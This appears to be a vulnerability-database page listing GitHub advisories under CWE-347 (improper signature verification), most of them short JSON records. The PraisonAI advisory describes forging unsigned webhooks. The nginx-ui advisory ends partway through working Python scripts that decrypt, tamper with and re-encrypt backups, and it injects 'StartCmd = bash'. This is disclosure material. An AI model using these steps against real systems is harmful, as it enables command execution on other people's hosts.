CWE-347
AllowedImproper Verification of Cryptographic Signature
Abstraction: Base · Status: Draft
The product does not verify, or incorrectly verifies, the cryptographic signature for data.
1123 vulnerabilities reference this CWE, most recent first.
GHSA-F9VH-CWPR-5M8F
Vulnerability from github – Published: 2025-07-28 18:31 – Updated: 2026-01-16 15:31A potential security vulnerability has been identified in the HP Linux Imaging and Printing Software documentation. This potential vulnerability is due to the use of a weak code signing key, Digital Signature Algorithm (DSA).
{
"affected": [],
"aliases": [
"CVE-2025-43023"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-28T18:15:25Z",
"severity": "MODERATE"
},
"details": "A potential security vulnerability has been identified in the HP Linux Imaging and Printing Software documentation. This potential vulnerability is due to the use of a weak code signing key, Digital Signature Algorithm (DSA).",
"id": "GHSA-f9vh-cwpr-5m8f",
"modified": "2026-01-16T15:31:22Z",
"published": "2025-07-28T18:31:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-43023"
},
{
"type": "WEB",
"url": "https://support.hp.com/us-en/document/ish_12804224-12804228-16/hpsbpi04033"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2025/08/22/4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-FC26-M9PF-V56Q
Vulnerability from github – Published: 2026-06-18 13:52 – Updated: 2026-06-18 13:52PraisonAI LinearBot processes unsigned webhooks when LINEAR_WEBHOOK_SECRET is missing
Summary
PraisonAI's LinearBot starts a public webhook listener on 0.0.0.0 and treats
LINEAR_WEBHOOK_SECRET as optional. When the secret is absent, startup only logs
a warning and _handle_webhook() skips Linear-Signature verification entirely.
An unauthenticated network caller who can reach the webhook endpoint can submit
a forged Linear-Event: AgentSession request. The forged request is parsed,
scheduled for background processing, dispatched to _handle_agent_session(),
and passed into BotSessionManager.chat(). The bot then attempts to post the
agent response back to Linear under the configured bot token.
The local PoV is offline and deterministic. It does not contact Linear. It calls the webhook handler directly, monkey-patches the outbound Linear comment path, and proves both sides of the boundary:
- no secret configured: unsigned forged webhook returns
200, invokes the agent session path once, and attempts one Linear comment; - secret configured: missing and bad signatures both return
401and do not invoke the agent; - secret configured with valid HMAC: request returns
200and invokes the agent, proving the control path still works.
Affected Product
- Repository:
MervinPraison/PraisonAI - Package:
praisonai - Components:
src/praisonai/praisonai/bots/linear.pysrc/praisonai/praisonai/cli/features/bots_cli.py
Validated affected:
- live
main/ latest observed releasev4.6.58:1ad58ca02975ff1398efeda694ea2ab78f20cf3e - previous local current checkout:
2f9677abb2ea68eab864ee8b6a828fd0141612e1 v4.6.57v4.6.56v4.5.50
Sampled tags where the LinearBot component was not present:
v4.5.49v4.5.51v4.6.9v4.6.10
Suggested affected range: LinearBot-bearing releases with the fail-open
signature behavior, at least 4.5.50 and >= 4.6.56, <= 4.6.58. The
component appears non-contiguously in sampled tags, so maintainers should
confirm the exact packaged version history before publishing a final range.
Root Cause
LinearBot.__init__() accepts an empty signing secret and falls back to an
empty environment value:
self._signing_secret = signing_secret or os.environ.get("LINEAR_WEBHOOK_SECRET", "")
start() treats the missing secret as a warning instead of refusing to expose
the webhook listener:
if not self._signing_secret:
logger.warning("LINEAR_WEBHOOK_SECRET not set - webhook signatures will not be verified")
self._site = web.TCPSite(self._runner, "0.0.0.0", self._webhook_port)
_handle_webhook() only verifies the request if the secret is truthy:
if self._signing_secret:
signature = request.headers.get("Linear-Signature", "")
if not self._verify_signature(raw_body, signature):
return web.Response(status=401, text="Invalid signature")
With no secret configured, the code continues to JSON parsing, accepts a caller
supplied webhookTimestamp, reads the caller supplied Linear-Event header,
and schedules processing:
event_type = request.headers.get("Linear-Event", "")
task = asyncio.create_task(self._process_webhook(event_type, body))
return web.Response(status=200, text="OK")
For AgentSession, the forged body is routed to the agent:
if event_type == "AgentSession":
await self._handle_agent_session(body)
...
response = await self._session_mgr.chat(self._agent, user_id, message.content)
await self._send_comment(...)
The CLI has the same fail-open posture: start_linear() loads
LINEAR_WEBHOOK_SECRET, prints a warning when it is missing, then reports a
public http://0.0.0.0:<port>/webhook endpoint with verification disabled.
Why This Is Not Intended Behavior
PraisonAI's Linear Bot documentation tells operators to set
LINEAR_WEBHOOK_SECRET, pass it to praisonai bot linear, copy the Linear
webhook signing secret, and use it for HMAC-SHA256 verification. The same page
says missing secrets disable signature verification, while its best-practices
section says webhook secrets ensure authenticity.
Linear's webhook documentation says receivers should ensure requests were sent
by Linear by verifying the Linear-Signature HMAC over the raw body, then
checking that webhookTimestamp is recent. The timestamp check alone is not an
authentication boundary because an attacker can supply a current timestamp in a
forged body.
The implementation itself also confirms the intended boundary: when a secret is configured, missing and bad signatures are rejected before agent dispatch. The bug is the missing-secret fail-open mode on a public webhook server, not the signature algorithm.
Local PoV
Run against the latest observed release checkout:
python3 submission-bundle/praisonai-prai-cand-013-linear-webhook-signature-fail-open/poc/pov_prai_cand_013_linear_webhook_signature_fail_open.py --repo artifacts/repos/praisonai-v4.6.58
Expected output includes:
{
"candidate": "PRAI-CAND-013",
"ok": true,
"cases": {
"no_secret_unsigned_forged_webhook": {
"http_status": 200,
"signing_secret_configured": false,
"session_calls": [
{
"user_id": "linear-system",
"content": "Issue: Forged Linear AgentSession event\n\nPRAI-CAND-013 local forged webhook payload"
}
],
"sent_comments": [
{
"issue_id": "issue-prai-cand-013",
"comment": "agent response",
"session_id": "prai-cand-013-session"
}
]
},
"secret_missing_signature_control": {
"http_status": 401,
"session_calls": []
},
"secret_bad_signature_control": {
"http_status": 401,
"session_calls": []
},
"secret_valid_signature_control": {
"http_status": 200,
"session_calls": [
{
"user_id": "linear-system"
}
]
}
}
}
Stored evidence:
evidence/pov-v4.6.58.jsonevidence/pov-live-main-v4.6.58.jsonevidence/pov-current-head.jsonevidence/version-sweep.tsv
Impact
If a PraisonAI operator starts LinearBot with a Linear token but omits
LINEAR_WEBHOOK_SECRET, any network caller that can reach the webhook endpoint
can spoof Linear webhook events and invoke the configured agent through the
Linear integration.
For the AgentSession event path, this lets the attacker supply issue title and
description content that becomes the agent input. Depending on the configured
agent and tools, this can cause unauthorized LLM/tool execution, consume paid
model quota, create or update Linear comments under the bot identity, and drive
the bot into workflows intended only for authenticated Linear events.
This report does not claim arbitrary code execution by default. The concrete boundary crossed is unauthenticated remote agent invocation through a forged Linear webhook.
Suggested Fix
Fail closed for public webhook listeners:
- Refuse to start LinearBot when
LINEAR_WEBHOOK_SECRETis missing, unless an explicit development-only option such as--insecure-skip-webhook-signature-verificationis provided. - In
_handle_webhook(), reject requests when no signing secret is configured instead of silently skipping verification. - Preserve raw-body HMAC verification and constant-time comparison for the configured-secret path.
- Treat timestamp freshness as replay protection after signature validation, not as a replacement for authentication.
- Prefer loopback binding by default, or require an explicit host flag for public binding.
- Add regression tests:
- no signing secret rejects startup or rejects webhook requests;
- missing signature with a configured secret returns
401; - invalid signature with a configured secret returns
401; - valid HMAC with a configured secret returns success;
- stale timestamp after valid HMAC returns
401; - the CLI does not advertise a public unauthenticated webhook by default.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.6.58"
},
"package": {
"ecosystem": "PyPI",
"name": "praisonai"
},
"ranges": [
{
"events": [
{
"introduced": "4.6.56"
},
{
"fixed": "4.6.59"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-306",
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-18T13:52:55Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "# PraisonAI LinearBot processes unsigned webhooks when `LINEAR_WEBHOOK_SECRET` is missing\n\n## Summary\n\nPraisonAI\u0027s LinearBot starts a public webhook listener on `0.0.0.0` and treats\n`LINEAR_WEBHOOK_SECRET` as optional. When the secret is absent, startup only logs\na warning and `_handle_webhook()` skips `Linear-Signature` verification entirely.\n\nAn unauthenticated network caller who can reach the webhook endpoint can submit\na forged `Linear-Event: AgentSession` request. The forged request is parsed,\nscheduled for background processing, dispatched to `_handle_agent_session()`,\nand passed into `BotSessionManager.chat()`. The bot then attempts to post the\nagent response back to Linear under the configured bot token.\n\nThe local PoV is offline and deterministic. It does not contact Linear. It calls\nthe webhook handler directly, monkey-patches the outbound Linear comment path,\nand proves both sides of the boundary:\n\n- no secret configured: unsigned forged webhook returns `200`, invokes the\n agent session path once, and attempts one Linear comment;\n- secret configured: missing and bad signatures both return `401` and do not\n invoke the agent;\n- secret configured with valid HMAC: request returns `200` and invokes the\n agent, proving the control path still works.\n\n## Affected Product\n\n- Repository: `MervinPraison/PraisonAI`\n- Package: `praisonai`\n- Components:\n - `src/praisonai/praisonai/bots/linear.py`\n - `src/praisonai/praisonai/cli/features/bots_cli.py`\n\nValidated affected:\n\n- live `main` / latest observed release `v4.6.58`:\n `1ad58ca02975ff1398efeda694ea2ab78f20cf3e`\n- previous local current checkout:\n `2f9677abb2ea68eab864ee8b6a828fd0141612e1`\n- `v4.6.57`\n- `v4.6.56`\n- `v4.5.50`\n\nSampled tags where the LinearBot component was not present:\n\n- `v4.5.49`\n- `v4.5.51`\n- `v4.6.9`\n- `v4.6.10`\n\nSuggested affected range: LinearBot-bearing releases with the fail-open\nsignature behavior, at least `4.5.50` and `\u003e= 4.6.56, \u003c= 4.6.58`. The\ncomponent appears non-contiguously in sampled tags, so maintainers should\nconfirm the exact packaged version history before publishing a final range.\n\n## Root Cause\n\n`LinearBot.__init__()` accepts an empty signing secret and falls back to an\nempty environment value:\n\n```python\nself._signing_secret = signing_secret or os.environ.get(\"LINEAR_WEBHOOK_SECRET\", \"\")\n```\n\n`start()` treats the missing secret as a warning instead of refusing to expose\nthe webhook listener:\n\n```python\nif not self._signing_secret:\n logger.warning(\"LINEAR_WEBHOOK_SECRET not set - webhook signatures will not be verified\")\n\nself._site = web.TCPSite(self._runner, \"0.0.0.0\", self._webhook_port)\n```\n\n`_handle_webhook()` only verifies the request if the secret is truthy:\n\n```python\nif self._signing_secret:\n signature = request.headers.get(\"Linear-Signature\", \"\")\n if not self._verify_signature(raw_body, signature):\n return web.Response(status=401, text=\"Invalid signature\")\n```\n\nWith no secret configured, the code continues to JSON parsing, accepts a caller\nsupplied `webhookTimestamp`, reads the caller supplied `Linear-Event` header,\nand schedules processing:\n\n```python\nevent_type = request.headers.get(\"Linear-Event\", \"\")\ntask = asyncio.create_task(self._process_webhook(event_type, body))\nreturn web.Response(status=200, text=\"OK\")\n```\n\nFor `AgentSession`, the forged body is routed to the agent:\n\n```python\nif event_type == \"AgentSession\":\n await self._handle_agent_session(body)\n...\nresponse = await self._session_mgr.chat(self._agent, user_id, message.content)\nawait self._send_comment(...)\n```\n\nThe CLI has the same fail-open posture: `start_linear()` loads\n`LINEAR_WEBHOOK_SECRET`, prints a warning when it is missing, then reports a\npublic `http://0.0.0.0:\u003cport\u003e/webhook` endpoint with verification disabled.\n\n## Why This Is Not Intended Behavior\n\nPraisonAI\u0027s Linear Bot documentation tells operators to set\n`LINEAR_WEBHOOK_SECRET`, pass it to `praisonai bot linear`, copy the Linear\nwebhook signing secret, and use it for HMAC-SHA256 verification. The same page\nsays missing secrets disable signature verification, while its best-practices\nsection says webhook secrets ensure authenticity.\n\nLinear\u0027s webhook documentation says receivers should ensure requests were sent\nby Linear by verifying the `Linear-Signature` HMAC over the raw body, then\nchecking that `webhookTimestamp` is recent. The timestamp check alone is not an\nauthentication boundary because an attacker can supply a current timestamp in a\nforged body.\n\nThe implementation itself also confirms the intended boundary: when a secret is\nconfigured, missing and bad signatures are rejected before agent dispatch. The\nbug is the missing-secret fail-open mode on a public webhook server, not the\nsignature algorithm.\n\n## Local PoV\n\nRun against the latest observed release checkout:\n\n```bash\npython3 submission-bundle/praisonai-prai-cand-013-linear-webhook-signature-fail-open/poc/pov_prai_cand_013_linear_webhook_signature_fail_open.py --repo artifacts/repos/praisonai-v4.6.58\n```\n\nExpected output includes:\n\n```json\n{\n \"candidate\": \"PRAI-CAND-013\",\n \"ok\": true,\n \"cases\": {\n \"no_secret_unsigned_forged_webhook\": {\n \"http_status\": 200,\n \"signing_secret_configured\": false,\n \"session_calls\": [\n {\n \"user_id\": \"linear-system\",\n \"content\": \"Issue: Forged Linear AgentSession event\\n\\nPRAI-CAND-013 local forged webhook payload\"\n }\n ],\n \"sent_comments\": [\n {\n \"issue_id\": \"issue-prai-cand-013\",\n \"comment\": \"agent response\",\n \"session_id\": \"prai-cand-013-session\"\n }\n ]\n },\n \"secret_missing_signature_control\": {\n \"http_status\": 401,\n \"session_calls\": []\n },\n \"secret_bad_signature_control\": {\n \"http_status\": 401,\n \"session_calls\": []\n },\n \"secret_valid_signature_control\": {\n \"http_status\": 200,\n \"session_calls\": [\n {\n \"user_id\": \"linear-system\"\n }\n ]\n }\n }\n}\n```\n\nStored evidence:\n\n- `evidence/pov-v4.6.58.json`\n- `evidence/pov-live-main-v4.6.58.json`\n- `evidence/pov-current-head.json`\n- `evidence/version-sweep.tsv`\n\n## Impact\n\nIf a PraisonAI operator starts LinearBot with a Linear token but omits\n`LINEAR_WEBHOOK_SECRET`, any network caller that can reach the webhook endpoint\ncan spoof Linear webhook events and invoke the configured agent through the\nLinear integration.\n\nFor the `AgentSession` event path, this lets the attacker supply issue title and\ndescription content that becomes the agent input. Depending on the configured\nagent and tools, this can cause unauthorized LLM/tool execution, consume paid\nmodel quota, create or update Linear comments under the bot identity, and drive\nthe bot into workflows intended only for authenticated Linear events.\n\nThis report does not claim arbitrary code execution by default. The concrete\nboundary crossed is unauthenticated remote agent invocation through a forged\nLinear webhook.\n\n## Suggested Fix\n\nFail closed for public webhook listeners:\n\n1. Refuse to start LinearBot when `LINEAR_WEBHOOK_SECRET` is missing, unless an\n explicit development-only option such as\n `--insecure-skip-webhook-signature-verification` is provided.\n2. In `_handle_webhook()`, reject requests when no signing secret is configured\n instead of silently skipping verification.\n3. Preserve raw-body HMAC verification and constant-time comparison for the\n configured-secret path.\n4. Treat timestamp freshness as replay protection after signature validation,\n not as a replacement for authentication.\n5. Prefer loopback binding by default, or require an explicit host flag for\n public binding.\n6. Add regression tests:\n - no signing secret rejects startup or rejects webhook requests;\n - missing signature with a configured secret returns `401`;\n - invalid signature with a configured secret returns `401`;\n - valid HMAC with a configured secret returns success;\n - stale timestamp after valid HMAC returns `401`;\n - the CLI does not advertise a public unauthenticated webhook by default.",
"id": "GHSA-fc26-m9pf-v56q",
"modified": "2026-06-18T13:52:55Z",
"published": "2026-06-18T13:52:55Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-fc26-m9pf-v56q"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "PraisonAI LinearBot processes unsigned webhooks when LINEAR_WEBHOOK_SECRET is missing"
}
GHSA-FC79-J7VW-6XJG
Vulnerability from github – Published: 2022-05-14 01:01 – Updated: 2022-05-14 01:01The signature verification routine in Enigmail before 2.0.7 interprets user ids as status/control messages and does not correctly keep track of the status of multiple signatures, which allows remote attackers to spoof arbitrary email signatures via public keys containing crafted primary user ids.
{
"affected": [],
"aliases": [
"CVE-2018-12019"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-06-13T23:29:00Z",
"severity": "HIGH"
},
"details": "The signature verification routine in Enigmail before 2.0.7 interprets user ids as status/control messages and does not correctly keep track of the status of multiple signatures, which allows remote attackers to spoof arbitrary email signatures via public keys containing crafted primary user ids.",
"id": "GHSA-fc79-j7vw-6xjg",
"modified": "2022-05-14T01:01:32Z",
"published": "2022-05-14T01:01:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12019"
},
{
"type": "WEB",
"url": "https://github.com/RUB-NDS/Johnny-You-Are-Fired"
},
{
"type": "WEB",
"url": "https://github.com/RUB-NDS/Johnny-You-Are-Fired/blob/master/paper/johnny-fired.pdf"
},
{
"type": "WEB",
"url": "https://www.enigmail.net/index.php/en/download/changelog"
},
{
"type": "WEB",
"url": "http://openwall.com/lists/oss-security/2018/06/13/10"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/152703/Johnny-You-Are-Fired.html"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2019/Apr/38"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2019/04/30/4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FC9H-WHQ2-V747
Vulnerability from github – Published: 2024-10-15 15:30 – Updated: 2025-11-27 08:43The Elliptic prior to 6.6.0 for Node.js, in its for ECDSA implementation, does not correctly verify valid signatures if the hash contains at least four leading 0 bytes and when the order of the elliptic curve's base point is smaller than the hash, because of an _truncateToN anomaly. This leads to valid signatures being rejected. Legitimate transactions or communications may be incorrectly flagged as invalid.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "elliptic"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.6.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-48948"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2024-10-17T22:05:18Z",
"nvd_published_at": "2024-10-15T14:15:05Z",
"severity": "LOW"
},
"details": "The Elliptic prior to 6.6.0 for Node.js, in its for ECDSA implementation, does not correctly verify valid signatures if the hash contains at least four leading 0 bytes and when the order of the elliptic curve\u0027s base point is smaller than the hash, because of an _truncateToN anomaly. This leads to valid signatures being rejected. Legitimate transactions or communications may be incorrectly flagged as invalid.",
"id": "GHSA-fc9h-whq2-v747",
"modified": "2025-11-27T08:43:15Z",
"published": "2024-10-15T15:30:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-48948"
},
{
"type": "WEB",
"url": "https://github.com/indutny/elliptic/issues/321"
},
{
"type": "WEB",
"url": "https://github.com/indutny/elliptic/pull/322"
},
{
"type": "WEB",
"url": "https://github.com/indutny/elliptic/commit/34c853478cec1be4e37260ed2cb12cdbdc6402cf"
},
{
"type": "WEB",
"url": "https://blog.trailofbits.com/2025/11/18/we-found-cryptography-bugs-in-the-elliptic-library-using-wycheproof"
},
{
"type": "PACKAGE",
"url": "https://github.com/indutny/elliptic"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20241220-0004"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Valid ECDSA signatures erroneously rejected in Elliptic"
}
GHSA-FCJ4-PM86-7GJW
Vulnerability from github – Published: 2024-02-08 15:30 – Updated: 2024-02-08 15:30Improper Verification of Cryptographic Signature vulnerability in Snow Software Inventory Agent on Unix allows File Manipulation through Snow Update Packages.This issue affects Inventory Agent: through 7.3.1.
{
"affected": [],
"aliases": [
"CVE-2024-1150"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-02-08T13:15:09Z",
"severity": "HIGH"
},
"details": "Improper Verification of Cryptographic Signature vulnerability in Snow Software Inventory Agent on Unix allows File Manipulation through Snow Update Packages.This issue affects Inventory Agent: through 7.3.1.\n\n",
"id": "GHSA-fcj4-pm86-7gjw",
"modified": "2024-02-08T15:30:27Z",
"published": "2024-02-08T15:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1150"
},
{
"type": "WEB",
"url": "https://community.snowsoftware.com/s/feed/0D5Td000004YtMcKAK"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FF5X-X5CH-2X28
Vulnerability from github – Published: 2022-05-13 01:30 – Updated: 2025-12-03 21:30In verify_emsa_pkcs1_signature() in gmp_rsa_public_key.c in the gmp plugin in strongSwan 4.x and 5.x before 5.7.0, the RSA implementation based on GMP does not reject excess data in the digestAlgorithm.parameters field during PKCS#1 v1.5 signature verification. Consequently, a remote attacker can forge signatures when small public exponents are being used, which could lead to impersonation when only an RSA signature is used for IKEv2 authentication. This is a variant of CVE-2006-4790 and CVE-2014-1568.
{
"affected": [],
"aliases": [
"CVE-2018-16152"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-09-26T21:29:00Z",
"severity": "HIGH"
},
"details": "In verify_emsa_pkcs1_signature() in gmp_rsa_public_key.c in the gmp plugin in strongSwan 4.x and 5.x before 5.7.0, the RSA implementation based on GMP does not reject excess data in the digestAlgorithm.parameters field during PKCS#1 v1.5 signature verification. Consequently, a remote attacker can forge signatures when small public exponents are being used, which could lead to impersonation when only an RSA signature is used for IKEv2 authentication. This is a variant of CVE-2006-4790 and CVE-2014-1568.",
"id": "GHSA-ff5x-x5ch-2x28",
"modified": "2025-12-03T21:30:55Z",
"published": "2022-05-13T01:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-16152"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2018/09/msg00032.html"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/201811-16"
},
{
"type": "WEB",
"url": "https://usn.ubuntu.com/3771-1"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2018/dsa-4305"
},
{
"type": "WEB",
"url": "https://www.strongswan.org/blog/2018/09/24/strongswan-vulnerability-%28cve-2018-16151%2C-cve-2018-16152%29.html"
},
{
"type": "WEB",
"url": "https://www.strongswan.org/blog/2018/09/24/strongswan-vulnerability-(cve-2018-16151,-cve-2018-16152).html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00077.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00001.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00047.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FFHG-7MH4-33C4
Vulnerability from github – Published: 2021-05-18 15:29 – Updated: 2023-02-16 00:14golang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "golang.org/x/crypto"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20200220183623-bac4c82f6975"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-9283"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2021-05-17T22:02:30Z",
"nvd_published_at": "2020-02-20T20:15:00Z",
"severity": "HIGH"
},
"details": "golang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.",
"id": "GHSA-ffhg-7mh4-33c4",
"modified": "2023-02-16T00:14:18Z",
"published": "2021-05-18T15:29:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-9283"
},
{
"type": "WEB",
"url": "https://github.com/golang/crypto/commit/bac4c82f69751a6dd76e702d54b3ceb88adab236"
},
{
"type": "PACKAGE",
"url": "https://github.com/golang/crypto"
},
{
"type": "WEB",
"url": "https://go.dev/cl/220357"
},
{
"type": "WEB",
"url": "https://go.googlesource.com/crypto/+/bac4c82f69751a6dd76e702d54b3ceb88adab236"
},
{
"type": "WEB",
"url": "https://groups.google.com/forum/#!topic/golang-announce/3L45YRc91SY"
},
{
"type": "WEB",
"url": "https://groups.google.com/g/golang-announce/c/3L45YRc91SY"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/10/msg00014.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/11/msg00027.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/11/msg00031.html"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2020-0012"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/48121"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/156480/Go-SSH-0.0.2-Denial-Of-Service.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Improper Verification of Cryptographic Signature in golang.org/x/crypto"
}
GHSA-FHH2-GG7W-GWPQ
Vulnerability from github – Published: 2026-03-30 16:23 – Updated: 2026-07-06 19:35Summary
The nginx-ui backup restore mechanism allows attackers to tamper with encrypted backup archives and inject malicious configuration during restoration.
Details
The backup format lacks a trusted integrity root. Although files are encrypted, the encryption key and IV are provided to the client and the integrity metadata (hash_info.txt) is encrypted using the same key. As a result, an attacker who can access the backup token can decrypt the archive, modify its contents, recompute integrity hashes, and re-encrypt the bundle.
Because the restore process does not enforce integrity verification and accepts backups even when hash mismatches are detected, the system restores attacker-controlled configuration even when integrity verification warnings are raised. In certain configurations this may lead to arbitrary command execution on the host.
The backup system is built around the following workflow:
- Backup files are compressed into
nginx-ui.zipandnginx.zip. - The files are encrypted using AES-256-CBC.
- SHA-256 hashes of the encrypted files are stored in
hash_info.txt. - The hash file is also encrypted with the same AES key and IV.
- The AES key and IV are provided to the client as a "backup security token".
This architecture creates a circular trust model:
- The encryption key is available to the client.
- The integrity metadata is encrypted with that same key.
- The restore process trusts hashes contained within the backup itself.
Because the attacker can decrypt and re-encrypt all files using the provided token, they can also recompute valid hashes for any modified content.
Environment
- OS: Kali Linux 6.17.10-1kali1 (6.17.10+kali-amd64)
- Application Version: nginx-ui v2.3.3 (513) e5da6dd (go1.26.0)
- Deployment: Docker Container default installation
- Relevant Source Files:
backup_crypto.gobackup.gorestore.goSystemRestoreContent.vue
PoC
-
Generate a backup and extract the security token (Key and IV) from the HTTP response headers or the
.keyfile. -
Decrypt the
nginx-ui.ziparchive using the obtained token.
import base64
import os
import sys
import zipfile
from io import BytesIO
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
def decrypt_aes_cbc(encrypted_data: bytes, key_b64: str, iv_b64: str) -> bytes:
key = base64.b64decode(key_b64)
iv = base64.b64decode(iv_b64)
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted = cipher.decrypt(encrypted_data)
return unpad(decrypted, AES.block_size)
def process_local_backup(file_path, token, output_dir):
key_b64, iv_b64 = token.split(":")
os.makedirs(output_dir, exist_ok=True)
print(f"[*] File processing: {file_path}")
with zipfile.ZipFile(file_path, 'r') as main_zip:
main_zip.extractall(output_dir)
files_to_decrypt = ["hash_info.txt", "nginx-ui.zip", "nginx.zip"]
for filename in files_to_decrypt:
path = os.path.join(output_dir, filename)
if os.path.exists(path):
with open(path, "rb") as f:
encrypted = f.read()
decrypted = decrypt_aes_cbc(encrypted, key_b64, iv_b64)
out_path = path + ".decrypted"
with open(out_path, "wb") as f:
f.write(decrypted)
print(f"[*] Successfully decrypted: {out_path}")
# Manual config
BACKUP_FILE = "backup-20260314-151959.zip"
TOKEN = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
OUTPUT = "decrypted"
if __name__ == "__main__":
process_local_backup(BACKUP_FILE, TOKEN, OUTPUT)
- Modify the contained
app.inito inject malicious configuration (e.g.,StartCmd = bash). - Re-compress the files and calculate the new SHA-256 hash.
- Update
hash_info.txtwith the new, legitimate-looking hashes for the modified files. - Encrypt the bundle again using the original Key and IV.
import base64
import hashlib
import os
import zipfile
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
def encrypt_file(data, key_b64, iv_b64):
key = base64.b64decode(key_b64)
iv = base64.b64decode(iv_b64)
cipher = AES.new(key, AES.MODE_CBC, iv)
return cipher.encrypt(pad(data, AES.block_size))
def build_rebuilt_backup(files, token, output_filename="backup_rebuild.zip"):
key_b64, iv_b64 = token.split(":")
encrypted_blobs = {}
for fname in files:
with open(fname, "rb") as f:
data = f.read()
